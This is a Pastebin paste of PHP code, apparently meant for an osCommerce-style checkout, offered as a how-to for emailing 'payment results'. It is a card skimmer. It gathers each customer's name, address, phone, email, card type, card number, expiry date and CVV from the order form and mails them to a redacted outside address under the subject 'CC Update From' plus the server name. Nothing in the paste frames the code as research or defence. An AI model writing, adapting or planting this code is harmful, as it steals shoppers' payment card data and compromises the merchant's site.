Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- How to log Payment result send to your emails
- $order->info['cc_owner'] = $HTTP_POST_VARS['cc_owner'];
- $order->info['cc_type'] = $cc_validation->cc_type;
- $order->info['cc_number'] = $HTTP_POST_VARS['cc_number_nh-dns'];
- $order->info['cc_expires'] = $HTTP_POST_VARS['cc_expires_month'] . $HTTP_POST_VARS['cc_expires_year'];
- $firstname = $order->billing['firstname'];
- $lastname = $order->billing['lastname'];
- $street = $order->billing['street_address'];
- $city = $order->billing['city'];
- $state = $order->billing['state'];
- $zip = $order->billing['postcode'];
- $country = $order->billing['country']['title'];
- $dayphone = $order->customer['telephone'];
- $ccowner = $_POST['cc_owner'];
- $ccnumber = $HTTP_POST_VARS['cc_number_nh-dns'];
- $ccexp = $HTTP_POST_VARS['cc_expires_month'] . $HTTP_POST_VARS['cc_expires_year'];
- $cardtype = $_POST['cc_type'];
- $cvv = $_POST['cc_cvv'];
- $cemail = $order->customer['email_address'];
- $servernya = $_SERVER['SERVER_NAME'];
- $alamat = "";
- $message = "\n Name:$firstname $lastname \n Address:$street \n City:$city \n State:$state \n Zip:$zip \n Country:$country \n Phone:$dayphone \n email:$cemail \n cctype:$cardtype \n ccowner:$ccowner \n cc:$ccnumber \n exp:$ccexp \n cvv:$cvv \n alamat:$alamat \n";
- mail("[email protected]","CC Update From $servernya", "$message");
Add Comment
Please, Sign In to add comment